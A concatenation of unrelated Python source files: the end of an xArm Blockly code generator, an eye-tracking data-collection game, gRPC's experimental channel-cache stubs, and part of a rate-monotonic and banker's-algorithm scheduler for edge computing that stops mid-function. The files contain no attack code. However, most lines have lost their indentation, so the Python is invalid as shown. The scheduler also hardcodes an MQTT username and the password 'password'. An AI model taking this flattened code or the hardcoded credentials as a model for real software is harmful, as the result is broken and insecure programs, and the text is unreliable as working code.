self._append_to_file('{} pprint(\'line_track_back_origin, code={{}}\'.format(code))'.format(prefix))
if __name__ == '__main__':
    blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\\projects\\test\\xarm6\\app\\myapp\\local_test_1\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\app_template\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\test_gpio\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\pour_water\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\233\\app.xml')
import os
target_path = os.path.join(os.path.expanduser('~'), '.UFACTORY', 'app', 'tmp')
if not os.path.exists(target_path):
os.makedirs(target_path)
target_file = os.path.join(target_path, 'blockly_app.py')
blockly.to_python(target_file, arm='192.168.1.145')
|
data_creation_game4.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 11:00:24 2020
@author: djoghurt
"""
import cv2
import numpy as np
import dlib
from math import hypot
import pyautogui
import random
import subprocess
import json
import threading
import time
import os
receiveBuffer = ""
receiveStatus = 0
DATA = ""
stopReader = False
class screenShape:
width = 0
height = 0
def create_dot(screen, screenSize):
screen.fill(255)
x = random.randint(1, screenSize.width)
y = random.randint(1, screenSize.height)
cv2.circle(screen, (x,y), 10, (0,0,255), -1)
return (x,y)
def dotGreen(screen, targetLoc):
#print("dotGreen")
screen.fill(255)
cv2.circle(screen, targetLoc, 10, (0,255,0), -1)
def save_data():
pass
def game_init(screenSize, fullScreen=True):
screen = np.zeros([screenSize.height,screenSize.width,3],dtype=np.uint8)
screen.fill(255)
targetLoc = (int(screenSize.width/2),int(screenSize.height/2))
cv2.circle(screen, targetLoc, 10, (0,0,255), -1)
    if fullScreen:
cv2.namedWindow("window", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("window",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)
return screen, screenSize, targetLoc
def dataReceiver(process):
global receiveBuffer, receiveStatus, DATA, stopReader
newData = False
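    # Frames are read from the child process's stdout: text between "<data>" and "</data>"
    # markers is accumulated into receiveBuffer and then published via the global DATA string.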
    while not stopReader and process.poll() is None:
outputRaw = process.stdout.readline()
output = str(outputRaw.strip())[2:-1]
index = output.find("<data>")
if index > -1:
#print("start!")
receiveBuffer = ""
output = output[index+6:]
if receiveStatus==1:
print("WARNING: I received a data start key without finishing my previous data read, data might be corrupted!")
receiveStatus = 1
index = output.find("</data>")
if index > -1:
#print("stop!")
receiveBuffer = receiveBuffer+output[:index]
#print(receiveBuffer)
receiveStatus = 0
DATA = receiveBuffer
newData = True
if receiveStatus==1:
receiveBuffer = receiveBuffer+output
process.kill()
def startupRecognition():
global DATA, stopReader
#process = subprocess.Popen(['echo', '"Hello stdout"'], stdout=subprocess.PIPE)
#process = subprocess.Popen(["python", "testPrinter.py"], stdout=subprocess.PIPE)
process = subprocess.Popen(["python", "featureGrabber.py"], stdout=subprocess.PIPE)
threadReader = threading.Thread(target=dataReceiver, args=(process,))
threadReader.start()
print("waiting for the recognition model to start up, this can take a minute")
print("please make sure privacy cover is away from the camera")
t=0
timer=0
    while process.poll() is None and len(DATA) == 0:  # wait until first data is received
t=t+1
if t>100000:
print(".", end='')
t=0
timer=timer+1
assert len(DATA)>0,"ERROR: something went wrong, couldn't have communication with the recognition model"
print("took us",timer)
print("\nlets goooo!!!")
return process
def storeDatapoint(targetLoc):
global DATA
print("targetLoc:",targetLoc,"DATA:",DATA)
data = DATA
DATA=""
data = json.loads(data)
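    # NOTE: the parsed feature data is currently discarded here; to actually build a dataset it
    # would need to be paired with targetLoc and written out (e.g. appended to a file).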
def main():
global stopReader
started=False
process = startupRecognition()
screenSize = pyautogui.size()
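    # NOTE: the monitor size queried above is immediately discarded and replaced with a small
    # 100x100 test window below; this appears to be a debugging override.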
screenSize = screenShape()
screenSize.width = 100
screenSize.height = 100
screen, screenSize, targetLoc = game_init(screenSize, fullScreen=False)
while True:
cv2.imshow('window', screen)
if len(DATA)>0:
dotGreen(screen, targetLoc)
key = cv2.waitKey(1)
if key == 32:
if len(DATA)>0:
if started:
storeDatapoint(targetLoc)
else:
started=True
targetLoc = create_dot(screen, screenSize)
else:
print("no new data")
#cv2.putText(screen, 'face', (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2, cv2.LINE_AA)
if key == 27:
stopReader=True
print("quitting")
break
if process.poll() is not None:
print("the model stopped, will quit now too")
stopReader=True
break
cv2.destroyAllWindows()
if __name__ == '__main__':
    main()
|
_simple_stubs.py
|
# Copyright 2020 The gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions that obviate explicit stubs and explicit channels."""
import collections
import datetime
import os
import logging
import threading
from typing import (Any, AnyStr, Callable, Dict, Iterator, Optional, Sequence,
Tuple, TypeVar, Union)
import grpc
from grpc.experimental import experimental_api
RequestType = TypeVar('RequestType')
ResponseType = TypeVar('ResponseType')
OptionsType = Sequence[Tuple[str, str]]
CacheKey = Tuple[str, OptionsType, Optional[grpc.ChannelCredentials], Optional[
grpc.Compression]]
_LOGGER = logging.getLogger(__name__)
_EVICTION_PERIOD_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS"
if _EVICTION_PERIOD_KEY in os.environ:
_EVICTION_PERIOD = datetime.timedelta(
seconds=float(os.environ[_EVICTION_PERIOD_KEY]))
_LOGGER.debug("Setting managed channel eviction period to %s",
_EVICTION_PERIOD)
else:
_EVICTION_PERIOD = datetime.timedelta(minutes=10)
_MAXIMUM_CHANNELS_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM"
if _MAXIMUM_CHANNELS_KEY in os.environ:
_MAXIMUM_CHANNELS = int(os.environ[_MAXIMUM_CHANNELS_KEY])
_LOGGER.debug("Setting maximum managed channels to %d", _MAXIMUM_CHANNELS)
else:
_MAXIMUM_CHANNELS = 2**8
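# Illustrative only: both settings are read once at import time, so any override must be in
# place before this module is imported, e.g. (values below are arbitrary examples):
#
#   os.environ["GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS"] = "60"
#   os.environ["GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM"] = "512"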
def _create_channel(target: str, options: Sequence[Tuple[str, str]],
channel_credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression]) -> grpc.Channel:
# TODO(rbellevi): Revisit the default value for this.
if channel_credentials is None:
raise NotImplementedError(
"channel_credentials must be supplied explicitly.")
if channel_credentials._credentials is grpc.experimental._insecure_channel_credentials:
_LOGGER.debug(f"Creating insecure channel with options '{options}' " +
f"and compression '{compression}'")
return grpc.insecure_channel(target,
options=options,
compression=compression)
else:
_LOGGER.debug(
f"Creating secure channel with credentials '{channel_credentials}', "
+ f"options '{options}' and compression '{compression}'")
return grpc.secure_channel(target,
credentials=channel_credentials,
options=options,
compression=compression)
class ChannelCache:
# NOTE(rbellevi): Untyped due to reference cycle.
_singleton = None
_lock: threading.RLock = threading.RLock()
_condition: threading.Condition = threading.Condition(lock=_lock)
_eviction_ready: threading.Event = threading.Event()
_mapping: Dict[CacheKey, Tuple[grpc.Channel, datetime.datetime]]
_eviction_thread: threading.Thread
def __init__(self):
self._mapping = collections.OrderedDict()
self._eviction_thread = threading.Thread(
target=ChannelCache._perform_evictions, daemon=True)
self._eviction_thread.start()
@staticmethod
def get():
with ChannelCache._lock:
if ChannelCache._singleton is None:
ChannelCache._singleton = ChannelCache()
ChannelCache._eviction_ready.wait()
return ChannelCache._singleton
def _evict_locked(self, key: CacheKey):
channel, _ = self._mapping.pop(key)
_LOGGER.debug("Evicting channel %s with configuration %s.", channel,
key)
channel.close()
del channel
@staticmethod
def _perform_evictions():
while True:
with ChannelCache._lock:
ChannelCache._eviction_ready.set()
if not ChannelCache._singleton._mapping:
ChannelCache._condition.wait()
elif len(ChannelCache._singleton._mapping) > _MAXIMUM_CHANNELS:
key = next(iter(ChannelCache._singleton._mapping.keys()))
ChannelCache._singleton._evict_locked(key)
# And immediately reevaluate.
else:
key, (_, eviction_time) = next(
iter(ChannelCache._singleton._mapping.items()))
now = datetime.datetime.now()
if eviction_time <= now:
ChannelCache._singleton._evict_locked(key)
continue
else:
time_to_eviction = (eviction_time - now).total_seconds()
# NOTE: We aim to *eventually* coalesce to a state in
# which no overdue channels are in the cache and the
                        # length of the cache is no longer than _MAXIMUM_CHANNELS.
# We tolerate momentary states in which these two
# criteria are not met.
ChannelCache._condition.wait(timeout=time_to_eviction)
def get_channel(self, target: str, options: Sequence[Tuple[str, str]],
channel_credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression]) -> grpc.Channel:
key = (target, options, channel_credentials, compression)
with self._lock:
channel_data = self._mapping.get(key, None)
if channel_data is not None:
channel = channel_data[0]
self._mapping.pop(key)
self._mapping[key] = (channel, datetime.datetime.now() +
_EVICTION_PERIOD)
return channel
else:
channel = _create_channel(target, options, channel_credentials,
compression)
self._mapping[key] = (channel, datetime.datetime.now() +
_EVICTION_PERIOD)
if len(self._mapping) == 1 or len(
self._mapping) >= _MAXIMUM_CHANNELS:
self._condition.notify()
return channel
def _test_only_channel_count(self) -> int:
with self._lock:
return len(self._mapping)
@experimental_api
def unary_unary(
request: RequestType,
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
"""Invokes a unary-unary RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
      request: The request value for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials() or
grpc.insecure_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
The response to the RPC.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.unary_unary(method, request_serializer,
response_deserializer)
return multicallable(request,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
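# Illustrative usage sketch (not part of this module). Assuming generated protobuf messages in
# `helloworld_pb2` and a server listening locally, a one-off call might look like:
#
#   response = unary_unary(
#       helloworld_pb2.HelloRequest(name="you"),
#       "localhost:50051",
#       "/helloworld.Greeter/SayHello",
#       request_serializer=helloworld_pb2.HelloRequest.SerializeToString,
#       response_deserializer=helloworld_pb2.HelloReply.FromString,
#       channel_credentials=grpc.experimental.insecure_channel_credentials(),
#       timeout=5.0,
#   )
#
# The service path, message types and address above are assumptions made for illustration.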
@experimental_api
def unary_stream(
request: RequestType,
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
"""Invokes a unary-stream RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
      request: The request value for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
An iterator of responses.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.unary_stream(method, request_serializer,
response_deserializer)
return multicallable(request,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def stream_unary(
request_iterator: Iterator[RequestType],
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
"""Invokes a stream-unary RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request_iterator: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
The response to the RPC.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.stream_unary(method, request_serializer,
response_deserializer)
return multicallable(request_iterator,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def stream_stream(
request_iterator: Iterator[RequestType],
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
"""Invokes a stream-stream RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
    from the cache after a fixed period by a background thread. Channels will
    also be evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request_iterator: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
An iterator of responses.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.stream_stream(method, request_serializer,
response_deserializer)
return multicallable(request_iterator,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
|
1.1_rms_bankers_Speak.py
|
# Author Emeka Ugwuanyi Emmanuel
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import threading
import ast
import time
import os
import psutil
import datetime as dt
import getpass as gp
import paho.mqtt.client as mqtt
from netifaces import interfaces, ifaddresses, AF_INET
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1]  # keeps count of how many deadlocks have been resolved
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
memory = []
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to this MEC for execution
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
# received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_task_queue = [] # [(task_list,wait_time), ....]
received_time = []
thread_record = []
port = 65000
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
stop = 0
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(algo.memory_percent(), 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = pc.verbose_ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id, )
connect_client.subscribe('mec')
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time()+['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
'''
else:
print('data: ', data)
elif data[0] == 't':
print('send: ', data[2:])
'''
def connect_to_broker():
global _client
global broker_ip
global topic
username = 'mec'
password = 'password'
broker_ip = 'localhost'
broker_port_no = 1883
topic = 'mec' # topic used to exchange mec details to clients
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_forever()
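# Hedged sketch (names illustrative, not called anywhere): the payload format
# that on_message() above expects from a client -- a 't ' prefix followed by
# the literal of a (tasks, t_time) pair, which start_loop() later unpacks.
def _client_task_payload_sketch(tasks_dict, t_time_dict):
    return 't ' + str((tasks_dict, t_time_dict))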
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
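# Hedged sketch (toy values, not used by the program): the hyperperiod is the
# lcm of all task periods and the idle task is sized to fill whatever capacity
# the real tasks leave unused, mirroring load_tasks() above.
def _hyperperiod_sketch():
    toy = {'t1': {'wcet': 1, 'period': 4}, 't2': {'wcet': 2, 'period': 6}}
    hyper = lcm([toy[t]['period'] for t in toy])  # lcm(4, 6) == 12
    return hyper, {**toy, 'idle': {'wcet': hyper, 'period': hyper + 1}}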
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
                    print('Scheduling failed at time %d' % _time_)
                    exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
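# Hedged illustration (toy values, not used by the program): rate-monotonic
# scheduling assigns fixed priorities by period -- the shorter the period, the
# higher the priority -- which is the ordering the scheduler above realises
# through its per-timestamp deadline comparison.
def _rms_priority_order_sketch():
    toy_tasks = {'t1': {'wcet': 1, 'period': 4}, 't2': {'wcet': 2, 'period': 6}}
    # sorting by period (ascending) gives the RMS priority order, highest first
    return sorted(toy_tasks, key=lambda t: toy_tasks[t]['period'])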
# generate execution sequence using banker's algorithm
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
                else:
                    # The loop above completed without a break, so every need
                    # of this process can be met with the current work:
                    # add the allocated resources of current P back to the
                    # available/work resources, i.e. free the resources.
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
